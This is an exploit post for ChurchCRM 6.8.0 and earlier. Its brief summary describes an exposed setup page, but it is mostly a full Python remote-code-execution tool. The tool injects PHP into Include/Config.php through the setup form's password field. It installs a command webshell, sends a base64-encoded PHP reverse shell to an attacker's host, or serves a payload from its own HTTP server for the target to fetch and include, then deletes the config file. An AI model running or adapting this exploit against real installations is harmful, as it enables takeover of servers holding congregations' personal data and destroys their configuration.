| # Title : ChurchCRM ≤ 6.8.0 – Setup Page Security Misconfiguration |
| # Author : indoushka |
| # Tested on : Windows 11 Pro (French) / Browser: Mozilla Firefox 147.0.3 (64-bit) |
| # Vendor : https://github.com/ChurchCRM/ |
=============================================================================================================================================
[+] Summary : ChurchCRM versions 6.8.0 and earlier expose the installation setup endpoint without proper access restrictions.
If the setup process remains accessible after deployment, it may allow unauthorized users to interact with configuration parameters.
This misconfiguration increases the risk of exploitation in unpatched or improperly secured installations.
Administrators are advised to disable or restrict access to the setup directory after installation and update to the latest secure version.
[+] POC :
#!/usr/bin/env python3
import argparse
import base64
import random
import string
import sys
import time
import logging
import re
import socket
import threading
import http.server
import socketserver
from urllib.parse import urljoin, urlparse, quote
from typing import Optional, Dict, Any, Tuple, List, Union
from dataclasses import dataclass, field
from enum import Enum
from functools import wraps
import json
import requests
from requests.exceptions import RequestException
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
VERSION = "2.0.0"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
TIMEOUT = 30
MAX_RETRIES = 3
DEFAULT_PATHS = ['', '/churchcrm', '/crm', '/church', '/crmchurch']
class ExploitError(Exception):
    """Common ancestor of every error type declared by this script."""


class TargetUnreachableError(ExploitError):
    """Signals that the target is not reachable."""


class InjectionFailedError(ExploitError):
    """Signals that a payload could not be injected."""


class PayloadServerError(ExploitError):
    """Signals a problem with the payload server."""


class VersionDetectionError(ExploitError):
    """Signals a problem while detecting the version."""
class TargetType(Enum):
    """Closed set of target-type identifiers; each value is the name in snake_case."""

    LINUX_CMD_STAGER = "linux_cmd_stager"
    PHP_MEMORY = "php_memory"
    PHP_FETCH = "php_fetch"
class CheckCode(Enum):
    """Possible outcomes reported by a vulnerability check."""

    SAFE = "safe"
    VULNERABLE = "vulnerable"
    UNKNOWN = "unknown"
    UNREACHABLE = "unreachable"
@dataclass
class TargetInfo:
    """Parsed description of the remote installation being inspected."""

    # Required fields, in positional order.
    url: str        # normalised URL of the target
    base_path: str  # path component of the URL
    scheme: str     # URL scheme, e.g. 'http' or 'https'
    host: str       # hostname taken from the URL
    port: int       # TCP port

    # Fields filled in later; unset until a check has run.
    version: Optional[str] = None
    vulnerable: Optional[bool] = None
    # Each instance gets its own list (default_factory), never a shared one.
    detected_paths: List[str] = field(default_factory=list)
@dataclass
class ExploitResult:
    """Outcome record returned to the caller after a run."""

    # Only mandatory field: whether the run succeeded.
    success: bool
    # Optional HTTP session associated with the run.
    session: Optional[requests.Session] = None
    # Human-readable status text.
    message: str = ""
    # Description of the target the run was performed against, if any.
    target: Optional[TargetInfo] = None
    # Captured textual output, if any.
    output: Optional[str] = None
class Version:
    """Parsed software version supporting ordering, equality and hashing.

    Attributes:
        original: The string passed to the constructor, unmodified.
        clean: The first ``X.Y`` or ``X.Y.Z`` run found in ``original``
            (``'0.0.0'`` when none is present).
        parts: ``clean`` split on dots and converted to integers.
        suffix: Trailing pre-release tag such as ``beta2`` or ``RC1``
            (empty string when absent).

    Comparisons accept either another ``Version`` or a plain string, which
    is parsed on the fly. Missing numeric components are treated as zero,
    so ``Version('6.8') == Version('6.8.0')``.
    """

    def __init__(self, version_string: str):
        self.original = version_string
        self.clean = self._clean_version(version_string)
        self.parts = self._parse_parts(self.clean)
        self.suffix = self._extract_suffix(version_string)

    def _clean_version(self, version: str) -> str:
        """Return the first dotted numeric run in *version*, or '0.0.0'."""
        match = re.search(r'(\d+\.\d+(?:\.\d+)?)', version)
        return match.group(1) if match else '0.0.0'

    def _parse_parts(self, version: str) -> List[int]:
        """Split *version* on dots; non-numeric pieces become 0."""
        parts = []
        for part in version.split('.'):
            try:
                parts.append(int(part))
            except ValueError:
                parts.append(0)
        return parts

    def _extract_suffix(self, version: str) -> str:
        """Extract a trailing suffix (e.g., -beta2, -RC1), or ''."""
        match = re.search(r'[-_]([a-zA-Z]+\d*)$', version)
        return match.group(1) if match else ''

    @staticmethod
    def _coerce(other) -> Optional['Version']:
        """Turn *other* into a Version, or None when it is an unsupported type."""
        if isinstance(other, Version):
            return other
        if isinstance(other, str):
            return Version(other)
        return None

    def _key(self) -> Tuple[int, ...]:
        """Numeric parts with trailing zeros removed.

        Stripping trailing zeros makes '6.8' and '6.8.0' produce the same
        key, so equality, ordering and hashing all agree with each other.
        """
        trimmed = list(self.parts)
        while trimmed and trimmed[-1] == 0:
            trimmed.pop()
        return tuple(trimmed)

    def __lt__(self, other: Union[str, 'Version']) -> bool:
        """Less than comparison; a suffixed version sorts before its release."""
        other = self._coerce(other)
        if other is None:
            return NotImplemented
        mine, theirs = self._key(), other._key()
        if mine != theirs:
            return mine < theirs
        # Same numbers: only "has suffix" vs "no suffix" is ordered.
        return bool(self.suffix) and not other.suffix

    def __le__(self, other: Union[str, 'Version']) -> bool:
        """Less than or equal."""
        other = self._coerce(other)
        if other is None:
            return NotImplemented
        return self.__lt__(other) or self.__eq__(other)

    def __eq__(self, other: Union[str, 'Version']) -> bool:
        """Equal when numeric parts (zero-padded) and suffix both match."""
        other = self._coerce(other)
        if other is None:
            return NotImplemented
        return self._key() == other._key() and self.suffix == other.suffix

    def __hash__(self) -> int:
        # Defining __eq__ disables the inherited hash; restore one that is
        # consistent with equality.
        return hash((self._key(), self.suffix))

    def __str__(self) -> str:
        return self.original

    def __repr__(self) -> str:
        return f"Version('{self.original}')"
def safe_urljoin(base: str, path: str) -> str:
    """
    Append *path* to *base* while keeping any path already present in *base*.

    Unlike ``urllib.parse.urljoin``, a leading slash on *path* does not
    discard the base's own path component.

    Examples:
    >>> safe_urljoin('http://example.com/churchcrm', '/setup/')
    'http://example.com/churchcrm/setup/'
    >>> safe_urljoin('http://example.com/churchcrm/', 'setup/')
    'http://example.com/churchcrm/setup/'
    """
    trimmed = base.rstrip('/')

    # Relative path: glue it on with exactly one separating slash.
    if not path.startswith('/'):
        return f"{trimmed}/{path}"

    # Rooted path: rebuild from scheme + netloc + existing path, then append.
    pieces = urlparse(trimmed)
    origin = f"{pieces.scheme}://{pieces.netloc}"
    existing_path = pieces.path.rstrip('/')
    return origin + existing_path + path
def normalize_url(url: str) -> str:
    """Return *url* with an 'http://' scheme prepended when it has neither
    'http://' nor 'https://', and with all trailing slashes removed."""
    has_scheme = url.startswith('http://') or url.startswith('https://')
    candidate = url if has_scheme else 'http://' + url
    return candidate.rstrip('/')
def parse_target(url: str) -> TargetInfo:
    """Normalise *url* and break it into the fields of a TargetInfo.

    The base path falls back to '/' when the URL has no path, and the port
    falls back to 443 for https or 80 otherwise when none is given.
    """
    normalized = normalize_url(url)
    pieces = urlparse(normalized)

    fallback_port = 443 if pieces.scheme == 'https' else 80
    path_without_slash = pieces.path.rstrip('/')

    return TargetInfo(
        url=normalized,
        base_path=path_without_slash or '/',
        scheme=pieces.scheme,
        host=pieces.hostname,
        port=pieces.port or fallback_port,
    )
def discover_base_path(session: requests.Session, base_url: str,
                       paths: Optional[List[str]] = None,
                       logger: Optional[logging.Logger] = None) -> Optional[str]:
    """
    Discover the correct base path by trying common paths.

    Args:
        session: HTTP session used to issue the probe requests.
        base_url: URL whose scheme and network location are probed; any path
            it carries is ignored.
        paths: Candidate base paths, tried in order. Defaults to
            DEFAULT_PATHS when omitted.
        logger: Optional logger for progress messages.

    Returns:
        The first ``scheme://netloc[path]`` whose ``/setup/`` page answers
        with HTTP 200, 301 or 302, or None when no candidate does.
    """
    candidates = DEFAULT_PATHS if paths is None else paths
    parsed = urlparse(base_url)
    origin = f"{parsed.scheme}://{parsed.netloc}"

    for path in candidates:
        test_url = f"{origin}{path}" if path else origin
        setup_url = safe_urljoin(test_url, '/setup/')
        if logger:
            logger.debug(f"Trying path: {setup_url}")
        try:
            response = session.get(setup_url, timeout=5, allow_redirects=False)
        except RequestException as exc:
            # Only network/HTTP failures mean "try the next candidate".
            # A bare except here used to swallow Ctrl-C and real bugs too.
            if logger:
                logger.debug(f"Probe failed for {setup_url}: {exc}")
            continue
        if response.status_code in (200, 301, 302):
            if logger:
                logger.info(f"Found ChurchCRM at: {test_url}")
            return test_url
    return None
class ColoredFormatter(logging.Formatter):
    """Formatter that wraps the level name in an ANSI colour escape sequence.

    The colour is applied only to the text this formatter produces; the log
    record itself is left unchanged, so other handlers attached to the same
    logger never see the escape codes.
    """

    # Level name -> escape sequence; 'RESET' ends the coloured span.
    COLORS = {
        'DEBUG': '\033[36m',
        'INFO': '\033[32m',
        'WARNING': '\033[33m',
        'ERROR': '\033[31m',
        'CRITICAL': '\033[35m',
        'RESET': '\033[0m'
    }

    def format(self, record):
        """Return the formatted record with a coloured level name."""
        plain_name = record.levelname
        color = self.COLORS.get(plain_name)
        if color is None:
            return super().format(record)

        record.levelname = f"{color}{plain_name}{self.COLORS['RESET']}"
        try:
            return super().format(record)
        finally:
            # The record is shared by every handler; put the plain name back
            # so the colour codes do not leak into their output.
            record.levelname = plain_name
def setup_logger(debug: bool = False) -> logging.Logger:
    """Return the script's named logger, configured for console output.

    The level is DEBUG when *debug* is true and INFO otherwise. A coloured
    stdout handler is attached only if the logger has no handlers yet, so
    calling this repeatedly does not duplicate output.
    """
    log = logging.getLogger('churchcrm_exploit')
    log.setLevel(logging.DEBUG if debug else logging.INFO)

    if log.handlers:
        return log

    console = logging.StreamHandler(sys.stdout)
    console.setFormatter(
        ColoredFormatter(
            '%(asctime)s [%(levelname)s] %(message)s',
            datefmt='%H:%M:%S'
        )
    )
    log.addHandler(console)
    return log
def create_session(retries: int = MAX_RETRIES) -> requests.Session:
    """Build a requests session with automatic retries and browser-like headers.

    Requests are retried up to *retries* times, with a 0.5 backoff factor,
    when the server answers 500, 502, 503 or 504. The retry policy covers
    HEAD, GET, OPTIONS and POST, and is mounted for both http and https.
    """
    retry_policy = Retry(
        total=retries,
        backoff_factor=0.5,
        status_forcelist=[500, 502, 503, 504],
        allowed_methods=["HEAD", "GET", "OPTIONS", "POST"]
    )
    retrying_adapter = HTTPAdapter(max_retries=retry_policy)

    default_headers = {
        'User-Agent': USER_AGENT,
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'keep-alive',
    }

    session = requests.Session()
    for prefix in ("http://", "https://"):
        session.mount(prefix, retrying_adapter)
    session.headers.update(default_headers)
    return session
def random_string(length: int = 8) -> str:
    """Return *length* characters drawn at random from a-z."""
    letters = random.choices(string.ascii_lowercase, k=length)
    return ''.join(letters)
def random_int_string(min_len: int = 5, max_len: int = 10) -> str:
    """Return a random string of decimal digits.

    The length is picked uniformly between *min_len* and *max_len*
    (both inclusive) before the digits themselves are drawn.
    """
    digit_count = random.randint(min_len, max_len)
    digits = random.choices(string.digits, k=digit_count)
    return ''.join(digits)
def random_url() -> str:
    """Return an http URL whose host is eight random lowercase letters plus '.com'."""
    hostname = random_string(8)
    return f"http://{hostname}.com/"
class PayloadHandler(http.server.SimpleHTTPRequestHandler):
"""HTTP handler for serving payloads"""
payload = None
logger = None
request_count = 0
def do_GET(self):
"""Handle GET request"""
PayloadHandler.request_count += 1
if self.logger:
self.logger.debug(f"Payload request #{PayloadHandler.request_count} from {self.client_address[0]}")
if self.payload:
self.send_response(200)
self.send_header('Content-Type', 'application/x-httpd-php')
self.send_header('Content-Length', str(len(self.payload)))
self.send_header('Pragma', 'no-cache')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
self.end_headers()
self.wfile.write(self.payload.encode())
if self.logger:
self.logger.info(f"Served payload to {self.client_address[0]}")
else:
self.send_response(404)
self.end_headers()
def log_message(self, format, *args):
"""Override to use our logger"""
if self.logger and self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug(f"Payload server: {format % args}")
class PayloadServer:
"""HTTP server for serving payloads"""
def __init__(self, logger: logging.Logger, host: str = '0.0.0.0', port: int = 0):
self.logger = logger
self.host = host
self.port = port
self.server = None
self.thread = None
self.payload = None
def start(self, payload: str) -> str:
"""Start payload server and return URL"""
self.payload = payload
PayloadHandler.payload = payload
PayloadHandler.logger = self.logger
PayloadHandler.request_count = 0
self.server = socketserver.TCPServer((self.host, self.port), PayloadHandler, bind_and_activate=False)
self.server.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.server_bind()
self.server.server_activate()
self.port = self.server.server_address[1]
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.daemon = True
self.thread.start()
server_url = f"http://{self.get_local_ip()}:{self.port}/"
self.logger.info(f"Payload server started at {server_url}")
return server_url
def stop(self):
"""Stop payload server"""
if self.server:
self.server.shutdown()
self.server.server_close()
self.logger.debug(f"Payload server stopped (served {PayloadHandler.request_count} requests)")
def get_local_ip(self) -> str:
"""Get local IP address"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
ip = '127.0.0.1'
finally:
s.close()
return ip
def wait_for_requests(self, timeout: int = 10) -> bool:
"""Wait for at least one request"""
start = time.time()
while time.time() - start < timeout:
if PayloadHandler.request_count > 0:
return True
time.sleep(0.5)
return False
class VersionDetector:
    """Extracts a ChurchCRM version string from an HTTP response.

    Candidates are collected from response headers and from a list of
    regular expressions applied to the body; the version seen most often
    wins.
    """

    # Shared capture group: X.Y or X.Y.Z with an optional '-suffix'.
    _VERSION_GROUP = r'([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)'

    def __init__(self, logger: logging.Logger):
        self.logger = logger
        ver = self._VERSION_GROUP
        # (pattern text, label used in debug output), applied in this order.
        specs = [
            (r'CRM-VERSION:\s*' + ver, 'header'),
            (r'<meta[^>]*name=["\']version["\'][^>]*content=["\']' + ver, 'meta'),
            (r'<meta[^>]*content=["\']' + ver + r'[^>]*name=["\']version', 'meta'),
            (r'<!--\s*ChurchCRM[^\d]*' + ver, 'comment'),
            (r'ChurchCRM[^\d]*' + ver, 'footer'),
            (r'window\.ChurchCRM\s*=\s*\{[^}]*version:\s*["\']' + ver, 'js'),
            (r'"softwareVersion"\s*:\s*"' + ver, 'json'),
            (r'ChurchCRM[\/\s-]*' + ver, 'php'),
        ]
        self.patterns = [(re.compile(text, re.I), label) for text, label in specs]

    def detect(self, response: requests.Response) -> Optional[Version]:
        """Return the most frequently seen version in *response*, or None.

        Looks at the CRM-VERSION header, the X-Powered-By header, and every
        body pattern. Ties go to the version that was encountered first.
        """
        found = []
        headers = response.headers

        if 'CRM-VERSION' in headers:
            candidate = self._clean_version(headers['CRM-VERSION'])
            if candidate:
                self.logger.debug(f"Version found in header: {candidate}")
                found.append(('header', candidate))

        if 'X-Powered-By' in headers:
            powered = re.search(r'ChurchCRM[\/\s-]*' + self._VERSION_GROUP,
                                headers['X-Powered-By'], re.I)
            if powered:
                candidate = self._clean_version(powered.group(1))
                if candidate:
                    self.logger.debug(f"Version found in X-Powered-By: {candidate}")
                    found.append(('x-powered', candidate))

        for regex, label in self.patterns:
            for hit in regex.findall(response.text):
                # findall yields tuples when a pattern has several groups.
                text = hit[0] if isinstance(hit, tuple) else hit
                candidate = self._clean_version(text)
                if candidate:
                    self.logger.debug(f"Version found in {label}: {candidate}")
                    found.append((label, candidate))

        if not found:
            return None

        # Tally by string form; dict order keeps first-seen-wins on ties.
        tally = {}
        for _label, candidate in found:
            key = str(candidate)
            tally[key] = tally.get(key, 0) + 1

        winner = max(tally, key=tally.get)
        self.logger.debug(f"Most common version: {winner} (appears {tally[winner]} times)")
        return Version(winner)

    def _clean_version(self, version: str) -> Optional[Version]:
        """Parse the first version-looking token in *version*, or return None."""
        found = re.search(self._VERSION_GROUP, version.strip())
        if found is None:
            return None
        return Version(found.group(1))

    def is_vulnerable(self, version: Optional[Version]) -> Optional[bool]:
        """Return True when *version* is at most 6.8.0.

        Returns None when *version* is missing or the comparison raises.
        """
        if not version:
            return None
        try:
            vulnerable = version <= '6.8.0'
            self.logger.debug(f"Version {version} <= 6.8.0? {vulnerable}")
        except Exception as e:
            self.logger.error(f"Version comparison error: {e}")
            return None
        return vulnerable
class ChurchCRMExploit:
"""ChurchCRM RCE Exploit"""
def __init__(self, target_url: str, logger: logging.Logger,
target_type: TargetType = TargetType.LINUX_CMD_STAGER,
lhost: Optional[str] = None, lport: Optional[int] = None,
payload: Optional[str] = None, verify_ssl: bool = True,
proxy: Optional[str] = None, auto_discover: bool = True):
self.logger = logger
self.original_url = target_url
self.target_type = target_type
self.lhost = lhost
self.lport = lport
self.custom_payload = payload
self.verify_ssl = verify_ssl
self.proxy = proxy
self.auto_discover = auto_discover
self.session = create_session()
self.payload_server = None
self.version_detector = VersionDetector(logger)
self.backdoor_injected = False
if proxy:
self.session.proxies = {'http': proxy, 'https': proxy}
self.target = self._initialize_target(target_url)
def _initialize_target(self, target_url: str) -> TargetInfo:
"""Initialize target with optional path discovery"""
try:
info = parse_target(target_url)
test_url = safe_urljoin(info.url, '/setup/')
response = self.session.get(test_url, timeout=5, verify=self.verify_ssl, allow_redirects=False)
if response.status_code in [200, 301, 302]:
self.logger.info(f"Target URL working: {info.url}")
info.detected_paths.append(info.base_path)
return info
except:
pass
if self.auto_discover:
self.logger.info("Direct URL not working, attempting path discovery...")
discovered = discover_base_path(self.session, target_url, logger=self.logger)
if discovered:
info = parse_target(discovered)
info.detected_paths = DEFAULT_PATHS
self.logger.info(f"Discovered ChurchCRM at: {info.url}")
return info
return parse_target(target_url)
def check(self) -> Dict[str, Any]:
"""Check if target is vulnerable"""
self.logger.info(f"Checking target: {self.target.url}")
try:
url = safe_urljoin(self.target.url, '/setup/')
self.logger.debug(f"Accessing {url}")
response = self.session.get(
url,
timeout=TIMEOUT,
verify=self.verify_ssl,
allow_redirects=True
)
self.logger.debug(f"Response code: {response.status_code}")
if response.status_code not in [200, 301, 302]:
self.logger.warning(f"Unexpected response code: {response.status_code}")
return {
'code': CheckCode.UNREACHABLE,
'message': f'Setup page returned HTTP {response.status_code}'
}
version = self.version_detector.detect(response)
if version:
self.logger.info(f"Detected ChurchCRM version: {version}")
vulnerable = self.version_detector.is_vulnerable(version)
self.target.version = str(version)
self.target.vulnerable = vulnerable
if vulnerable:
self.logger.warning("Target appears VULNERABLE!")
return {
'code': CheckCode.VULNERABLE,
'version': str(version),
'message': f'Vulnerable version {version} detected'
}
else:
self.logger.info("Target appears NOT vulnerable")
return {
'code': CheckCode.SAFE,
'version': str(version),
'message': f'Version {version} is not vulnerable'
}
else:
self.logger.warning("Could not detect version")
return {
'code': CheckCode.UNKNOWN,
'message': 'Version unknown - setup page accessible'
}
except RequestException as e:
self.logger.error(f"Request failed: {e}")
return {
'code': CheckCode.UNREACHABLE,
'message': f'Target unreachable: {e}'
}
def build_payload(self) -> str:
"""Build payload based on target type"""
prefix = f"{random_string(3)}';"
if self.target_type == TargetType.PHP_MEMORY:
if self.custom_payload:
php_payload = self.custom_payload
else:
php_payload = self._generate_reverse_shell()
b64_payload = base64.b64encode(php_payload.encode()).decode()
return f"{prefix} eval(base64_decode(\"{b64_payload}\")); //"
elif self.target_type == TargetType.PHP_FETCH:
if not self.payload_server:
raise PayloadServerError("Payload server not started")
payload_name = f"/tmp/{random_string(8)}.php"
server_url = f"http://{self.lhost}:{self.payload_server.port}/"
return (f"{prefix} $f='{payload_name}'; "
f"file_put_contents($f, file_get_contents('{server_url}')); "
f"register_shutdown_function('unlink', $f); include($f); //")
else:
return f"{prefix} system($_GET['cmd']); //"
def _generate_reverse_shell(self) -> str:
"""Generate PHP reverse shell"""
if not self.lhost or not self.lport:
return "phpinfo();"
return f"""<?php
$lhost = '{self.lhost}';
$lport = {self.lport};
if (function_exists('fsockopen') && function_exists('proc_open')) {{
$sock = @fsockopen($lhost, $lport);
if ($sock) {{
$descriptors = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open((PHP_OS == 'WINNT' ? 'cmd' : '/bin/sh'), $descriptors, $pipes);
proc_close($process);
}}
}}
if (function_exists('socket_create') && function_exists('proc_open')) {{
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($sock && @socket_connect($sock, $lhost, $lport)) {{
$descriptors = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open((PHP_OS == 'WINNT' ? 'cmd' : '/bin/sh'), $descriptors, $pipes);
proc_close($process);
}}
}}
?>"""
def inject_backdoor(self) -> bool:
"""Inject backdoor via setup page"""
self.logger.info("Injecting backdoor into Include/Config.php...")
payload = self.build_payload()
post_data = {
'DB_SERVER_NAME': random_string(8),
'DB_SERVER_PORT': '3306',
'DB_NAME': random_string(8),
'DB_USER': random_string(6),
'DB_PASSWORD': payload,
'ROOT_PATH': '/',
'URL': random_url()
}
self.logger.debug(f"POST data prepared (password field contains payload)")
try:
url = safe_urljoin(self.target.url, '/setup/')
self.logger.debug(f"Sending POST to {url}")
response = self.session.post(
url,
data=post_data,
timeout=TIMEOUT,
verify=self.verify_ssl,
allow_redirects=False
)
if response.status_code == 200:
self.logger.info("Backdoor injected successfully!")
self.backdoor_injected = True
return True
else:
self.logger.error(f"Injection failed with HTTP {response.status_code}")
return False
except RequestException as e:
self.logger.error(f"Injection request failed: {e}")
return False
def execute_command(self, cmd: str) -> Optional[str]:
"""Execute command on target"""
if not self.backdoor_injected:
self.logger.warning("Backdoor not injected yet. Attempting injection...")
if not self.inject_backdoor():
self.logger.error("Cannot execute command: backdoor injection failed")
return None
self.logger.info(f"Executing command: {cmd}")
try:
url = safe_urljoin(self.target.url, '/')
self.logger.debug(f"Command URL: {url}?cmd={quote(cmd)}")
response = self.session.get(
url,
params={'cmd': cmd},
timeout=TIMEOUT,
verify=self.verify_ssl
)
if response.status_code == 200:
output = response.text.strip()
if '<html' in output.lower():
body_match = re.search(r'<body[^>]*>(.*?)</body>', output, re.S | re.I)
if body_match:
output = body_match.group(1).strip()
output = re.sub(r'<[^>]+>', ' ', output)
output = re.sub(r'\s+', ' ', output).strip()
return output
else:
self.logger.error(f"Command execution failed with HTTP {response.status_code}")
return None
except RequestException as e:
self.logger.error(f"Command execution request failed: {e}")
return None
def cleanup(self) -> bool:
"""Clean up - remove backdoor"""
if not self.backdoor_injected:
self.logger.debug("No backdoor to clean up")
return True
self.logger.info("Cleaning up...")
commands = [
'rm -f Include/Config.php',
'rm Include/Config.php',
'rm -f churchcrm/Include/Config.php',
'del /f Include\\Config.php',
'php -r "unlink(\'Include/Config.php\');"',
'php -r "unlink(\'churchcrm/Include/Config.php\');"'
]
success = False
for cmd in commands:
result = self.execute_command(cmd)
if result is not None: # Command executed (even if file doesn't exist)
self.logger.debug(f"Cleanup command executed: {cmd}")
success = True
if success:
self.logger.info("Cleanup completed")
self.backdoor_injected = False
else:
self.logger.warning("Cleanup may have failed")
return success
def run_cmd_stager(self, cmd: str) -> Tuple[bool, Optional[str]]:
"""Run command stager"""
output = self.execute_command(cmd)
return (output is not None, output)
def run_php_memory(self) -> Tuple[bool, Optional[str]]:
"""Run PHP in-memory payload"""
self.logger.info("Executing PHP in-memory payload...")
try:
url = safe_urljoin(self.target.url, '/')
self.logger.debug(f"Triggering payload via GET to {url}")
response = self.session.get(url, timeout=TIMEOUT, verify=self.verify_ssl)
if response.status_code == 200:
self.logger.info("PHP payload executed successfully")
return (True, response.text[:500] + "..." if len(response.text) > 500 else response.text)
else:
self.logger.error(f"PHP execution failed with HTTP {response.status_code}")
return (False, None)
except RequestException as e:
self.logger.error(f"PHP execution request failed: {e}")
return (False, None)
def run_php_fetch(self) -> Tuple[bool, Optional[str]]:
"""Run PHP fetch payload"""
self.logger.info("Executing PHP fetch payload...")
self.payload_server = PayloadServer(self.logger, host='0.0.0.0')
if self.custom_payload:
payload = self.custom_payload
else:
payload = self._generate_reverse_shell()
try:
server_url = self.payload_server.start(payload)
self.logger.info(f"Serving payload from {server_url}")
time.sleep(2)
if self.inject_backdoor():
self.logger.info("Waiting for payload request...")
if self.payload_server.wait_for_requests(timeout=30):
self.logger.info("Payload was fetched by target")
time.sleep(5)
success = True
else:
self.logger.warning("No payload request received")
success = False
else:
success = False
return (success, None)
finally:
self.payload_server.stop()
def exploit(self) -> ExploitResult:
"""Main exploit method"""
self.logger.info(f"Starting exploit against {self.target.url}")
self.logger.info(f"Target type: {self.target_type.value}")
check_result = self.check()
if check_result['code'] == CheckCode.UNREACHABLE:
return ExploitResult(
success=False,
message=f"Target unreachable: {check_result['message']}"
)
if check_result['code'] == CheckCode.SAFE:
return ExploitResult(
success=False,
message=check_result['message']
)
if not self.inject_backdoor():
return ExploitResult(
success=False,
message="Failed to inject backdoor"
)
success = False
output = None
if self.target_type == TargetType.LINUX_CMD_STAGER:
if self.custom_payload:
success, output = self.run_cmd_stager(self.custom_payload)
else:
success, output = self.run_cmd_stager('id')
if success and output:
self.logger.info(f"Command output: {output.strip()}")
elif self.target_type == TargetType.PHP_MEMORY:
success, output = self.run_php_memory()
elif self.target_type == TargetType.PHP_FETCH:
success, output = self.run_php_fetch()
self.cleanup()
return ExploitResult(
success=success,
message="Exploit completed successfully" if success else "Exploit failed",
target=self.target,
output=output
)
def main():
"""Main entry point"""
parser = argparse.ArgumentParser(
description='ChurchCRM Unauthenticated RCE Exploit by indoushka',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Check vulnerability
%(prog)s http://target.com/churchcrm --check
# Execute command
%(prog)s http://target.com --cmd "id"
# Reverse shell (Linux)
%(prog)s http://target.com --reverse 192.168.1.100 4444
# Reverse shell with PHP fetch method
%(prog)s http://target.com --type php-fetch --reverse 192.168.1.100 4444
# Custom PHP payload
%(prog)s http://target.com --payload "<?php phpinfo(); ?>"
# With proxy and debug
%(prog)s http://target.com --check --proxy http://127.0.0.1:8080 --debug
Exit codes:
0 - Not vulnerable / Success
1 - Error / Unknown
2 - Vulnerable
"""
)
parser.add_argument('target', help='Target URL (e.g., http://target.com/churchcrm)')
parser.add_argument('--check', action='store_true', help='Check if target is vulnerable')
parser.add_argument('--cmd', metavar='COMMAND', help='Execute command')
parser.add_argument('--reverse', nargs=2, metavar=('LHOST', 'LPORT'),
help='Reverse shell (LHOST LPORT)')
parser.add_argument('--payload', metavar='CODE', help='Custom PHP payload')
parser.add_argument('--payload-file', metavar='FILE', help='PHP payload file')
parser.add_argument('--type', choices=['linux', 'php-memory', 'php-fetch'],
default='linux', help='Target type (default: linux)')
parser.add_argument('--proxy', help='HTTP proxy (e.g., http://127.0.0.1:8080)')
parser.add_argument('--no-verify', action='store_true', help='Disable SSL verification')
parser.add_argument('--debug', action='store_true', help='Enable debug output')
parser.add_argument('--no-discover', action='store_true',
help='Disable automatic path discovery')
args = parser.parse_args()
logger = setup_logger(args.debug)
if not any([args.check, args.cmd, args.reverse, args.payload, args.payload_file]):
logger.error("No action specified. Use --help for usage.")
sys.exit(1)
target_type_map = {
'linux': TargetType.LINUX_CMD_STAGER,
'php-memory': TargetType.PHP_MEMORY,
'php-fetch': TargetType.PHP_FETCH
}
target_type = target_type_map[args.type]
payload = None
if args.payload:
payload = args.payload
elif args.payload_file:
try:
with open(args.payload_file, 'r') as f:
payload = f.read()
except Exception as e:
logger.error(f"Failed to read payload file: {e}")
sys.exit(1)
try:
exploit = ChurchCRMExploit(
target_url=args.target,
logger=logger,
target_type=target_type,
lhost=args.reverse[0] if args.reverse else None,
lport=int(args.reverse[1]) if args.reverse else None,
payload=payload,
verify_ssl=not args.no_verify,
proxy=args.proxy,
auto_discover=not args.no_discover
)
except Exception as e:
logger.error(f"Failed to initialize exploit: {e}")
if args.debug:
import traceback
traceback.print_exc()
sys.exit(1)
try:
if args.check:
result = exploit.check()
if result['code'] == CheckCode.VULNERABLE:
logger.warning(f"Target is VULNERABLE! Version: {result.get('version', 'unknown')}")
sys.exit(2)
elif result['code'] == CheckCode.SAFE:
logger.info("Target is NOT vulnerable")
sys.exit(0)
else:
logger.warning(f"Unknown status: {result['message']}")
sys.exit(1)
elif args.cmd:
logger.info(f"Executing command: {args.cmd}")
if exploit.target_type != TargetType.LINUX_CMD_STAGER:
logger.warning(f"Switching target type from {exploit.target_type.value} to linux_cmd_stager")
exploit.target_type = TargetType.LINUX_CMD_STAGER
result = exploit.exploit()
if result.success and result.output:
print("\n" + "="*60)
print("COMMAND OUTPUT:")
print("="*60)
print(result.output)
print("="*60)
elif result.success:
print("\nCommand executed successfully (no output)")
else:
logger.error(f"Command execution failed: {result.message}")
sys.exit(1)
elif args.reverse:
logger.info(f"Attempting reverse shell to {args.reverse[0]}:{args.reverse[1]}")
if args.type == 'php-fetch':
exploit.target_type = TargetType.PHP_FETCH
elif args.type == 'php-memory':
exploit.target_type = TargetType.PHP_MEMORY
else:
exploit.target_type = TargetType.LINUX_CMD_STAGER
result = exploit.exploit()
if result.success:
logger.info("Reverse shell payload sent. Check your listener!")
if result.output:
print(f"\nOutput: {result.output}")
else:
logger.error(f"Reverse shell failed: {result.message}")
sys.exit(1)
else:
result = exploit.exploit()
if result.success:
logger.info("Exploit completed successfully!")
if result.output:
print(f"\nOutput: {result.output}")
else:
logger.error(f"Exploit failed: {result.message}")
sys.exit(1)
except KeyboardInterrupt:
logger.info("Interrupted by user")
sys.exit(130)
except Exception as e:
logger.error(f"Unexpected error: {e}")
if args.debug:
import traceback
traceback.print_exc()
sys.exit(1)
if __name__ == '__main__':
main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================